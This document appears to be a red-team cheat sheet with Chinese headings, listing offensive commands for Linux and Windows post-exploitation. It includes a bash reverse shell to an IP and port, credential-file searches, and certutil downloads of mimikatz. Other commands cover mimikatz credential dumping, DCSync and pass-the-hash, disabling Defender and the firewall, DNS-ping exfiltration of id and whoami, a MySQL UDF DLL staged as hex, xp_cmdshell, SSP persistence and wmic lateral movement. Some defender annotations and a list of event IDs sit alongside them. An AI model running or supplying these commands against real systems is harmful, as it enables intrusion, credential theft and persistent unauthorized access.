Linux一句话反弹

# interactive bash whose stdout+stderr (>&) and stdin (0>&1) are bound to a TCP connection to 192.168.1.123:12345 (sample address/port from the original note)
# defender note: a bash process with /dev/tcp as its stdio plus an outbound connection to an unusual port is a strong detection signal in combined process + network telemetry
bash -i >& /dev/tcp/192.168.1.123/12345 0>&1

Linux敏感文件搜索

find / -name *.properties 2>/dev/null | grep WEB-INF
find / -name "*.properties" | xargs egrep -i "user|pass|pwd|uname|login|db_" find / -regex ".*\.properties\|.*\.conf\|.*\.config" | xargs grep -E "=jdbc:|pass="

find /webapp -regex ".*\.properties" -print 2>/dev/null | xargs grep -E "=jdbc:|rsync"

find / -regex ".*\.properties" -print  2>/dev/null
find / -regex ".*\.properties\|.*\.conf\|.*\.config\|.*\.sh" | xargs grep -E "=jdbc:|pass=|passwd="
grep -r 'setCipherKey(Base64.decode(' /web路径
find / -regex ".*\.xml\|.*\.properties\|.*\.conf\|.*\.config\|.*\.jsp" | xargs grep -E "setCipherKey"

Linux保持shell会话（tmux）

# create a new named session
tmux new -s ccc
# list existing sessions
tmux ls
# attach to the session
tmux a -t ccc
# kill the session
tmux kill-session -t ccc

Linux建立交互shell


# inside the reverse shell, use a python one-liner to spawn bash under a pty
python -c 'import pty; pty.spawn("/bin/bash")'

# suspend the reverse shell (Ctrl-Z is a keystroke, not a command); after this step you essentially have a normal interactive shell
Ctrl-Z
echo $TERM    # note the $TERM value  # e.g. xterm
stty -a      # note the stty settings  # optional  # e.g. rows 39; columns 153;
stty raw -echo 
fg        # bring the suspended nc back with fg  # fg prints nothing  # press Enter afterwards; the first output may look garbled

开启3389

# sets fDenyTSConnections to 0 (0 = allow Terminal Services/RDP connections); /f overwrites without prompting
# defender note: modification of this value is a common post-compromise indicator; audit changes under the Terminal Server key
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

mimikatz读取rdp密码

"privilege::debug" "sekurlsa::dpapi" "log" "dpapi::cred /in:C:/Users/Administrator/AppData/Local/Microsoft/Credentials/xxxx" "exit"

查看远程桌面端口:

reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

锁屏:

rundll32.exe user32.dll,LockWorkStation

远程下载:

certutil.exe -urlcache -split -f http://xxxxx/mimikatz.exe
certutil.exe && certutil.exe -urlcache -split -f http://xxxxx/mimikatz.exe    //bypass

修改WDigest存储明文:

# sets WDigest UseLogonCredential to 1; without /f, reg prompts before overwriting an existing value
# defender note: the hardened state is this value absent or 0; alert when it becomes 1, since (per the heading above) it makes WDigest keep plaintext credentials
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

关闭defender:

# sets the Defender DisableAntiSpyware policy value to 1; without /f an existing value prompts before being overwritten
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /d 1 /t REG_DWORD

# add C:\tmp to the Defender exclusion list
# defender note: exclusion and policy changes are recorded in the Defender operational log (event 5007, configuration changed); Get-MpPreference shows the current exclusions
powershell -Command Add-MpPreference -ExclusionPath "C:\tmp" 

https://docs.microsoft.com/fr-fr/powershell/module/defender/add-mppreference?view=win10-ps

防火墙:

# turn the Windows Firewall off for all profiles (domain, private, public)
netsh advfirewall set allprofiles state off

# turn it back on for all profiles
# defender note: profile state changes are logged in the Windows Firewall With Advanced Security operational log; alert on transitions to "off"
netsh advfirewall set allprofiles state on

读取wifi密码:

for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

远程桌面保存凭据:

cmdkey /list

pth

FOR /F %i in (ips.txt) do net use \\%i\ipc$ "admin!@#45" /user:administrator

无回显Linux:

ping `hostname`.xxx.win
ping `id`.xxx.win
ping $(whoami).xxx.win 

无回显Windows:

cmd /c for /f %x in ('hostname') do ping -n 1 %x.xxx.win
cmd /c for /f %x in ('whoami') do ping -n 1 %x.xxx.win
ping %USERNAME%.avfisher.win -n 1

添加用户:

# create a local user account (name/password are placeholders)
# defender note: account creation logs Security event 4720 (see the event-ID list further down in this note)
net user name password /add
# add the account to the local Administrators group
net localgroup administrators name /add
# remove the account
net user name /delete

域内信息收集:

net user /domain //list domain users
net group /domain  //list all domain groups
net group “Domain Admins” /domain //list members of Domain Admins
net group "Domain Controllers" /domain  //list domain controllers
net localgroup administrators /domain  //list members of the domain's built-in Administrators group

# recursively list .xml files in the domain controller's SYSVOL share (域控 stands for the DC hostname)
# defender note: Group Policy Preference xml files in SYSVOL can still carry cpassword fields on unpatched/legacy setups (MS14-025); remove such files rather than relying on the patch alone
dir /s /a \\域控\sysvol\*.xml

mimikatz:

privilege::debug
sekurlsa::logonpassword(s)
lsadump::dcsync /domain:test.com /all /csv
xcopy mimikatz \\admin-pc\c$\temp 

reg mimikatz:

reg save HKLM\SYSTEM D:\sys.hiv
reg save HKLM\SAM D:\sam.hiv
lsadump::sam /sam:sam.hiv /system:sys.hiv

powershell允许执行脚本:

Set-ExecutionPolicy RemoteSigned

pth:

sekurlsa::pth /user:administrator /domain:workgroup /ntlm:ccef208c6485269c20db2cad21734fe7

sekurlsa::pth /user:administrator /domain:xxx /ntlm:xxxxxxxxxxxxxxxxxxxxx "/run:mstsc.exe /restrictedadmin"    //desktop

frp:

# frpc client section: the frps server to connect to and the shared token (xxx are placeholders)
[common]
server_addr = xxx
server_port = xxx
token = xxx

# proxy named plugin_socks5: a tcp proxy backed by frp's built-in socks5 plugin, exposed on the server's remote_port
# token, plugin_user and plugin_passwd are credentials; keep real values out of shared notes
[plugin_socks5]
type = tcp
remote_port = xxxx
plugin = socks5
plugin_user = xxx
plugin_passwd = xx

powershell弹框:

Add-Type -AssemblyName Microsoft.VisualBasic; [Microsoft.VisualBasic.Interaction]::MsgBox("xxxxx", "OKOnly,MsgBoxSetForeground,SystemModal,Exclamation", "")

mysql-udf:

# check file-writing restrictions (secure_file_priv) and the plugin directory location
show variables like "sec%"
show variables like 'plugin%';  
# stage the DLL bytes in a table, appended in chunks as hex literals
create table temp(data longblob);
insert into temp(data) values (0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000000000000000000);
update temp set data = concat(data,0x33c2ede077a383b377a383b377a383b369f110b375a383b369f100b37da383b369f107b375a383b35065f8b374a383b377a382b35ba383b369f10ab376a383b369f116b375a383b369f111b376a383b369f112b376a383b35269636877a383b300000000000000000000000000000000504500006486060070b1834b00000000);
# write the blob into the plugin directory
# defender note: a non-empty secure_file_priv blocks INTO DUMPFILE outside the allowed directory; keep the plugin directory unwritable by the mysql user and do not grant FILE to application accounts
select data from temp into dumpfile "G:\\phpstudy_pro\\Extensions\\MySQL5.7.26\\lib\\plugin\\udf.dll";
create function sys_eval returns string soname 'udf.dll';   # create the sys_eval function backed by udf.dll

mssql xp_cmdshell

# enable xp_cmdshell: expose advanced options first, then the option itself
exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;

# run an OS command through xp_cmdshell (here: creates a local user)
# defender note: keep xp_cmdshell disabled, audit sp_configure/reconfigure activity, and do not run the SQL Server service as a local administrator
exec master..xp_cmdshell 'net user test super123. /add'    

登录日志事件ID

4624    登录成功
4625    登录失败
4634    注销成功
4647    用户启动的注销
4672    使用超级用户/管理员用户进行登录
4720    创建用户
4697, 7045    PsExec（服务安装）

ssp

# registry: register mimilib1.dll in the LSA "Security Packages" multi-string value
# defender note: this value is a well-known SSP persistence location; monitor it and alert on any DLL added outside a change window
reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa" /v "Security Packages" /d "mimilib1.dll" /t REG_MULTI_SZ /f
# mimikatz: inject the SSP into lsass directly (misc::memssp)
privilege::debug
misc::memssp

springboot内存泄露

select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))

wmic横向

wmic /node:"192.168.1.1" /password:"****" /user:"workgroup\xxxxx" process call create "cmd.exe /c xxxxx'"